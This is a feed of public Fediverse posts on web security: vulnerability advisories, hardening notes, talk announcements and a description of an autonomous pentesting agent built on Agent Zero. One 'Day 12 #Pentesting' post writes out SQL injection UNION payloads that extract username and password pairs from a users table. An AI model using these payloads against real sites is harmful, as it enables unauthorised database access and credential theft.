#websecurity — Public Fediverse posts

What is Web Security and Web Penetration Testing Tools

In this article, I cover essential web penetration testing tools and how they fit into different stages of the assessment process.
https://denizhalil.com/2024/12/19/web-penetration-testing-tools/

#CyberSecurity #WebSecurity #Pentesting #BurpSuite #Nmap #SQLMap #BugBounty #RedTeam #InfoSec #EthicalHacking #SecurityTools #DenizHalil

FROST: una web puede espiar qué pestañas o apps usas midiendo E/S en SSD desde JavaScript, sin acciones extra del usuario. https://aidoo.news/noticia/rggwdl

#SeguridadInformatica #WebSecurity #SSD #Navegadores #Investigacion

FROST: una web puede espiar qué pestañas o apps usas midiendo E/S en SSD desde JavaScript, sin acciones extra del usuario. https://aidoo.news/noticia/rggwdl

#SeguridadInformatica #WebSecurity #SSD #Navegadores #Investigacion

If your WordPress malware keeps returning hours after you clean it, the infection probably is not in WordPress at all. I have seen this exact pattern — clean wp-config.php, it comes back, clean again, still back. A forensic case study shows how a webmail log file became a root-level backdoor, sitting entirely below WordPress where no security plugin can reach it.

#WordPress #SecurityHardening #Malware #WebSecurity

https://wpguy.uk/blog/why-cleaning-wordpress-malware-keeps-failing-when-the-backdoor-is-server-level/

----------------

🛠️ Tool
===================

Agent Zero Penetration Tester is a GitHub repository that configures a single Agent Zero instance as a specialized web application penetration testing agent. The agent operates autonomously within a defined scope, uses only integrated tools, and produces evidence-rich professional results.

Key Features

The repository provides a complete agent configuration:
• Role prompt defining methodology, capabilities, and reporting framework
• Context file with high-level agent description
• User mission prompt specifying operational workflow and success criteria
• Tool manifest (a0toolssetting.json) consumed by the platform runtime
• Model testing prompt for evaluating AI models on pentesting tasks
• Sandbox documentation for safe execution environments

Technical Implementation

Two tools drive operation:

1. code_execution_tool() runs command-line security tools. The prompt enforces sequencing constraints, like waiting for nikto to complete before starting gobuster. The runtime="output" parameter distinguishes completed processes from in-progress ones.

2. browser_agent() handles web interaction with a strict allowlist: only the origin of base_url (scheme://host:port) and same-host routes are accessible. The agent must open base_url first before navigating via UI.

Target configuration is read exclusively from /a0/tmp/initialinput.json inside the container. Example: base_url: http://127.0.0.1:3000 with demo credentials. No repository fallback exists.

Model Testing Framework

modeltestingprompt.md evaluates AI models on pentesting tool syntax accuracy, error handling, tool selection, and methodology adherence. This evaluates formulation ability, not live exploitation capability.

Scope and Safety

Safety constraints are defined in both the role prompt and the mission prompt. The browser allowlist limits exposure to intended targets. The agent is designed to stay within defined boundaries.

Use Cases
• Automated web app vulnerability assessment in controlled environments
• AI model evaluation for pentesting tool competence
• Security testing workflow validation and training
• Juice Shop scenarios with pre-configured defaults

Limitations

להערכתי, the repository assumes familiarity with Agent Zero's platform. No independent testing has been conducted. The model testing prompt evaluates syntax and methodology, not real-world exploitation effectiveness. A demo video is available showing the agent in action.

🔹 tool #pentesting #agentzero #websecurity #AIagent

🔗 Source: https://github.com/StirlingGoetz/a0pentester

74% of hacked WordPress sites were running outdated plugins at the time of breach. In my experience, most WordPress compromises are not clever attacks — they are automated scanners finding the weakest door. I have written up the five most common entry points I see in 2025 and what to do before the scanner finds you.

#WordPress #WordPressSecurity #SecurityHardening #WebSecurity

https://wpguy.uk/blog/why-wordpress-sites-get-hacked-the-five-most-common-entry-points-in-2025/

Deutsche Bahn bloquait les utilisateurs Linux sur son site — non par intention malveillante, mais via une logique de détection navigateur qui excluait silencieusement certains user-agents.

Ce genre de friction invisible mérite attention : moins d'accès = moins de visibilité sur les services publics. La diversité des clients HTTP, c'est aussi de la résilience.

#Linux #WebSecurity #infosec
https://feed.itsfoss.com/link/24361/17346770/deutsche-bahn-blocking-linux-users

Patch immediately before public exploits emerge.

https://www.drupal.org/sa-core-2026-004

Affected:

- 8.9.0 , < 10.4.10
- 10.5.0 , < 10.5.10
- 10.6.0 , < 10.6.9
- 11.0.0 , < 11.1.10
- 11.2.0 , < 11.2.12
- 11.3.0 , < 11.3.10

CVE-2026-9082 - Highly critical - SQL Injection
CVE-2026-8495 - Missing Authorization
CVE-2026-8493 - XSS
CVE-2026-8492
CVE-2026-8491

#Drupal #PHP #CyberSecurity #Infosec #CVE #WebSecurity #PostgreSQL #SqlInjection #PrivilegeEscalation #XSS

Patch immediately before public exploits emerge.

https://www.drupal.org/sa-core-2026-004

Affected:

- 8.9.0 , < 10.4.10
- 10.5.0 , < 10.5.10
- 10.6.0 , < 10.6.9
- 11.0.0 , < 11.1.10
- 11.2.0 , < 11.2.12
- 11.3.0 , < 11.3.10

CVE-2026-9082 - Highly critical - SQL Injection
CVE-2026-8495 - Missing Authorization
CVE-2026-8493 - XSS
CVE-2026-8492
CVE-2026-8491

#Drupal #PHP #CyberSecurity #Infosec #CVE #WebSecurity #PostgreSQL #SqlInjection #PrivilegeEscalation #XSS

Patch immediately before public exploits emerge.

https://www.drupal.org/sa-core-2026-004

Affected:

- 8.9.0 , < 10.4.10
- 10.5.0 , < 10.5.10
- 10.6.0 , < 10.6.9
- 11.0.0 , < 11.1.10
- 11.2.0 , < 11.2.12
- 11.3.0 , < 11.3.10

CVE-2026-9082 - Highly critical - SQL Injection
CVE-2026-8495 - Missing Authorization
CVE-2026-8493 - XSS
CVE-2026-8492
CVE-2026-8491

#Drupal #PHP #CyberSecurity #Infosec #CVE #WebSecurity #PostgreSQL #SqlInjection #PrivilegeEscalation #XSS

Patch immediately before public exploits emerge.

https://www.drupal.org/sa-core-2026-004

Affected:

- 8.9.0 , < 10.4.10
- 10.5.0 , < 10.5.10
- 10.6.0 , < 10.6.9
- 11.0.0 , < 11.1.10
- 11.2.0 , < 11.2.12
- 11.3.0 , < 11.3.10

CVE-2026-9082 - Highly critical - SQL Injection
CVE-2026-8495 - Missing Authorization
CVE-2026-8493 - XSS
CVE-2026-8492
CVE-2026-8491

#Drupal #PHP #CyberSecurity #Infosec #CVE #WebSecurity #PostgreSQL #SqlInjection #PrivilegeEscalation #XSS

📆 21 May 2026 - tomorrow!

"What Are Web Developers Doing About Security?" by @torgo at the Open Source SSF Community Day, Minneapolis, MN, USA 🇺🇸

In this talk Dan Appelquist, Samsung Open Source Group, will give a brief introduction to SWAG, an overview of the surprising results, what it means for the work ahead and how web developers and web browser developers are responding to the requirements of the CRA
#WebStandards #WebSecurity #WebDevelopers #OpenSSFCommunity

https://www.w3.org/events/talks/2026/what-are-web-developers-doing-about-security/

Neuer Artikel im Blog:

TYPO3-Security: 6 neue Advisories für News, KE Search und Co.

https://wwagner.net/blog/a/typo3-security-6-neue-advisories-fuer-news-ke-search-und-co

#TYPO3 #Security #WebSecurity

Neuer Artikel im Blog:

TYPO3-Security: 6 neue Advisories für News, KE Search und Co.

https://wwagner.net/blog/a/typo3-security-6-neue-advisories-fuer-news-ke-search-und-co

#TYPO3 #Security #WebSecurity

200,000 WordPress Sites at Risk from Critical Authentication Bypass Vulnerability in Burst Statistics Plugin

Patched in 3.4.2, update now.

https://www.wordfence.com/blog/2026/05/200000-wordpress-sites-at-risk-from-critical-authentication-bypass-vulnerability-in-burst-statistics-plugin

#WordPress #WebSecurity #Wordfence

200,000 WordPress Sites at Risk from Critical Authentication Bypass Vulnerability in Burst Statistics Plugin

Patched in 3.4.2, update now.

https://www.wordfence.com/blog/2026/05/200000-wordpress-sites-at-risk-from-critical-authentication-bypass-vulnerability-in-burst-statistics-plugin

#WordPress #WebSecurity #Wordfence

Published a new article: “Gadget Hunting in Practice”

The article focuses on practical prototype pollution hunting methodology:
• confirming pollution correctly
• identifying gadgets
• tracing execution sinks
• understanding weak vs strong sinks
• using DOM Invader and ppmap effectively

One of the biggest mistakes beginners make is trying to prove pollution, gadget discovery, and exploitation all at once.

https://medium.com/@marduk.i.am/a7f8b08e7d53

#bugbounty #xss #infosec #cybersecurity #websecurity

Published a new article: “Gadget Hunting in Practice”

The article focuses on practical prototype pollution hunting methodology:
• confirming pollution correctly
• identifying gadgets
• tracing execution sinks
• understanding weak vs strong sinks
• using DOM Invader and ppmap effectively

One of the biggest mistakes beginners make is trying to prove pollution, gadget discovery, and exploitation all at once.

https://medium.com/@marduk.i.am/a7f8b08e7d53

#bugbounty #xss #infosec #cybersecurity #websecurity

A critical authentication bypass in the Burst Statistics plugin scored 9.8 on the CVSS scale — meaning attackers could take full admin control of a WordPress site with zero credentials. Over 200,000 sites were exposed. If you are running this plugin, my advice is simple: update it now.

#WordPress #WordPressSecurity #SecurityHardening #WebSecurity #CyberSecurity

https://wpguy.uk/200000-wordpress-sites-at-risk-from-critical-authentication-bypass-vulnerability-in-burst-statistics-plugin/

Day 12 #Pentesting: SQL injection exploitation techniques that actually matter on engagements.

The jump from "I found an injection" to "here's the admin password hash" requires systematic work:

```
-- Find columns
' ORDER BY 3-- -
-- Find visible column
' UNION SELECT 'a','b','c'-- -
-- Extract data
' UNION SELECT null,CONCAT(user,':',pass),null FROM users-- -
```

Blind SQLi is where patience gets tested. One character at a time via boolean conditions. sqlmap handles the automation, but understand the manual process first.

#Infosec #Websecurity #Cybersecurity #Ctf

More and more websites want proof you’re human. Blame the bots
#AI #Cybersecurity #CAPTCHA #Technology #Internet #Bots #OnlineSecurity #DigitalSecurity #MachineLearning #Privacy #Spam #Automation #WebSecurity #Tech #CyberAttack #DataProtection #Innovation
https://the-14.com/more-and-more-websites-want-proof-youre-human-blame-the-bots/

More and more websites want proof you’re human. Blame the bots
#AI #Cybersecurity #CAPTCHA #Technology #Internet #Bots #OnlineSecurity #DigitalSecurity #MachineLearning #Privacy #Spam #Automation #WebSecurity #Tech #CyberAttack #DataProtection #Innovation
https://the-14.com/more-and-more-websites-want-proof-youre-human-blame-the-bots/

More and more websites want proof you’re human. Blame the bots
#AI #Cybersecurity #CAPTCHA #Technology #Internet #Bots #OnlineSecurity #DigitalSecurity #MachineLearning #Privacy #Spam #Automation #WebSecurity #Tech #CyberAttack #DataProtection #Innovation
https://the-14.com/more-and-more-websites-want-proof-youre-human-blame-the-bots/

More and more websites want proof you’re human. Blame the bots
#AI #Cybersecurity #CAPTCHA #Technology #Internet #Bots #OnlineSecurity #DigitalSecurity #MachineLearning #Privacy #Spam #Automation #WebSecurity #Tech #CyberAttack #DataProtection #Innovation
https://the-14.com/more-and-more-websites-want-proof-youre-human-blame-the-bots/

More and more websites want proof you’re human. Blame the bots
#AI #Cybersecurity #CAPTCHA #Technology #Internet #Bots #OnlineSecurity #DigitalSecurity #MachineLearning #Privacy #Spam #Automation #WebSecurity #Tech #CyberAttack #DataProtection #Innovation
https://the-14.com/more-and-more-websites-want-proof-youre-human-blame-the-bots/

🚨 CVE-2026-2347 — CRITICAL auth bypass in Akilli Commerce E-Commerce Website <4.5.001 via user-controlled key. Session hijack risk. No patch yet — restrict access, monitor sessions. https://radar.offseq.com/threat/cve-2026-2347-cwe-639-authorization-bypass-through-fe0b7401 #OffSeq #CVE20262347 #infosec #websecurity

🚨 CVE-2026-2347 — CRITICAL auth bypass in Akilli Commerce E-Commerce Website <4.5.001 via user-controlled key. Session hijack risk. No patch yet — restrict access, monitor sessions. https://radar.offseq.com/threat/cve-2026-2347-cwe-639-authorization-bypass-through-fe0b7401 #OffSeq #CVE20262347 #infosec #websecurity

🚨 CVE-2026-2347 — CRITICAL auth bypass in Akilli Commerce E-Commerce Website <4.5.001 via user-controlled key. Session hijack risk. No patch yet — restrict access, monitor sessions. https://radar.offseq.com/threat/cve-2026-2347-cwe-639-authorization-bypass-through-fe0b7401 #OffSeq #CVE20262347 #infosec #websecurity

🚨 CVE-2026-2347 — CRITICAL auth bypass in Akilli Commerce E-Commerce Website <4.5.001 via user-controlled key. Session hijack risk. No patch yet — restrict access, monitor sessions. https://radar.offseq.com/threat/cve-2026-2347-cwe-639-authorization-bypass-through-fe0b7401 #OffSeq #CVE20262347 #infosec #websecurity

FYI: Chrome on Android now lets users share approximate location with websites: Chrome for Android adds approximate location sharing, giving users a middle-ground privacy option between full location access and denial for website requests. https://ppc.land/chrome-on-android-now-lets-users-share-approximate-location-with-websites/ #Chrome #Android #Privacy #LocationSharing #WebSecurity

FYI: Chrome on Android now lets users share approximate location with websites: Chrome for Android adds approximate location sharing, giving users a middle-ground privacy option between full location access and denial for website requests. https://ppc.land/chrome-on-android-now-lets-users-share-approximate-location-with-websites/ #Chrome #Android #Privacy #LocationSharing #WebSecurity

FYI: Chrome on Android now lets users share approximate location with websites: Chrome for Android adds approximate location sharing, giving users a middle-ground privacy option between full location access and denial for website requests. https://ppc.land/chrome-on-android-now-lets-users-share-approximate-location-with-websites/ #Chrome #Android #Privacy #LocationSharing #WebSecurity

FYI: Chrome on Android now lets users share approximate location with websites: Chrome for Android adds approximate location sharing, giving users a middle-ground privacy option between full location access and denial for website requests. https://ppc.land/chrome-on-android-now-lets-users-share-approximate-location-with-websites/ #Chrome #Android #Privacy #LocationSharing #WebSecurity

The one header I didn't add yet: CSP.

For sites that render untrusted input it mitigates an active surface. For a static site it guards against rarer-but-bigger events: a compromised analytics script, a poisoned CDN, a future change that adds an input path.

Astro 6 added an integration for what it emits; iframes, external fonts, and third-party services stay manual. Will inshallah follow when the audit fits.

#CSP #WebSecurity #Astro #StaticSite

The one header I didn't add yet: CSP.

For sites that render untrusted input it mitigates an active surface. For a static site it guards against rarer-but-bigger events: a compromised analytics script, a poisoned CDN, a future change that adds an input path.

Astro 6 added an integration for what it emits; iframes, external fonts, and third-party services stay manual. Will inshallah follow when the audit fits.

#CSP #WebSecurity #Astro #StaticSite

The one header I didn't add yet: CSP.

For sites that render untrusted input it mitigates an active surface. For a static site it guards against rarer-but-bigger events: a compromised analytics script, a poisoned CDN, a future change that adds an input path.

Astro 6 added an integration for what it emits; iframes, external fonts, and third-party services stay manual. Will inshallah follow when the audit fits.

#CSP #WebSecurity #Astro #StaticSite

📆 21 May 2026, 16:00–16:10 CDT
"What Are Web Developers Doing About Security?" by @torgo at Open Source SSF Community Day, Minneapolis, MN, USA 🇺🇸

The W3C SWAG community group ran a survey to see what web security features and technologies web developers are using and how they're using them. This talk will be a brief introduction to SWAG, an overview of the surprising results, and what it means for the work ahead.
https://www.w3.org/events/talks/2026/what-are-web-developers-doing-about-security/
#WebStandards #WebSecurity #OpenSSFCommunity

📆 21 May 2026, 16:00–16:10 CDT
"What Are Web Developers Doing About Security?" by @torgo at Open Source SSF Community Day, Minneapolis, MN, USA 🇺🇸

The W3C SWAG community group ran a survey to see what web security features and technologies web developers are using and how they're using them. This talk will be a brief introduction to SWAG, an overview of the surprising results, and what it means for the work ahead.
https://www.w3.org/events/talks/2026/what-are-web-developers-doing-about-security/
#WebStandards #WebSecurity #OpenSSFCommunity

📆 21 May 2026, 16:00–16:10 CDT
"What Are Web Developers Doing About Security?" by @torgo at Open Source SSF Community Day, Minneapolis, MN, USA 🇺🇸

The W3C SWAG community group ran a survey to see what web security features and technologies web developers are using and how they're using them. This talk will be a brief introduction to SWAG, an overview of the surprising results, and what it means for the work ahead.
https://www.w3.org/events/talks/2026/what-are-web-developers-doing-about-security/
#WebStandards #WebSecurity #OpenSSFCommunity

📆 21 May 2026, 16:00–16:10 CDT
"What Are Web Developers Doing About Security?" by @torgo at Open Source SSF Community Day, Minneapolis, MN, USA 🇺🇸

The W3C SWAG community group ran a survey to see what web security features and technologies web developers are using and how they're using them. This talk will be a brief introduction to SWAG, an overview of the surprising results, and what it means for the work ahead.
https://www.w3.org/events/talks/2026/what-are-web-developers-doing-about-security/
#WebStandards #WebSecurity #OpenSSFCommunity

📆 21 May 2026, 16:00–16:10 CDT
"What Are Web Developers Doing About Security?" by @torgo at Open Source SSF Community Day, Minneapolis, MN, USA 🇺🇸

The W3C SWAG community group ran a survey to see what web security features and technologies web developers are using and how they're using them. This talk will be a brief introduction to SWAG, an overview of the surprising results, and what it means for the work ahead.
https://www.w3.org/events/talks/2026/what-are-web-developers-doing-about-security/
#WebStandards #WebSecurity #OpenSSFCommunity

Enabled HSTS with includeSubDomains and preload.

The cost is real and one-way: every current and future subdomain must serve HTTPS or become unreachable. Removal from the preload list is in browser-release hands, not yours.

Accepted because the site is HTTPS-only by intent and Caddy provisions certs for every subdomain automatically via Let's Encrypt.

#HSTS #WebSecurity #Caddy #SelfHosting

Enabled HSTS with includeSubDomains and preload.

The cost is real and one-way: every current and future subdomain must serve HTTPS or become unreachable. Removal from the preload list is in browser-release hands, not yours.

Accepted because the site is HTTPS-only by intent and Caddy provisions certs for every subdomain automatically via Let's Encrypt.

#HSTS #WebSecurity #Caddy #SelfHosting

Enabled HSTS with includeSubDomains and preload.

The cost is real and one-way: every current and future subdomain must serve HTTPS or become unreachable. Removal from the preload list is in browser-release hands, not yours.

Accepted because the site is HTTPS-only by intent and Caddy provisions certs for every subdomain automatically via Let's Encrypt.

#HSTS #WebSecurity #Caddy #SelfHosting

Enabled HSTS with includeSubDomains and preload.

The cost is real and one-way: every current and future subdomain must serve HTTPS or become unreachable. Removal from the preload list is in browser-release hands, not yours.

Accepted because the site is HTTPS-only by intent and Caddy provisions certs for every subdomain automatically via Let's Encrypt.

#HSTS #WebSecurity #Caddy #SelfHosting

🚨 CRITICAL: CVE-2026-44257 in efwGrp efw4.X (<4.08.010) enables remote, unauthenticated command execution via crafted zip uploads and path traversal. Patch to 4.08.010 ASAP. https://radar.offseq.com/threat/cve-2026-44257-cwe-77-improper-neutralization-of-s-a113f36f #OffSeq #vuln #infosec #websecurity

🚨 CRITICAL: CVE-2026-44257 in efwGrp efw4.X (<4.08.010) enables remote, unauthenticated command execution via crafted zip uploads and path traversal. Patch to 4.08.010 ASAP. https://radar.offseq.com/threat/cve-2026-44257-cwe-77-improper-neutralization-of-s-a113f36f #OffSeq #vuln #infosec #websecurity

🚨 CRITICAL: CVE-2026-44257 in efwGrp efw4.X (<4.08.010) enables remote, unauthenticated command execution via crafted zip uploads and path traversal. Patch to 4.08.010 ASAP. https://radar.offseq.com/threat/cve-2026-44257-cwe-77-improper-neutralization-of-s-a113f36f #OffSeq #vuln #infosec #websecurity

🚨 CRITICAL: CVE-2026-44257 in efwGrp efw4.X (<4.08.010) enables remote, unauthenticated command execution via crafted zip uploads and path traversal. Patch to 4.08.010 ASAP. https://radar.offseq.com/threat/cve-2026-44257-cwe-77-improper-neutralization-of-s-a113f36f #OffSeq #vuln #infosec #websecurity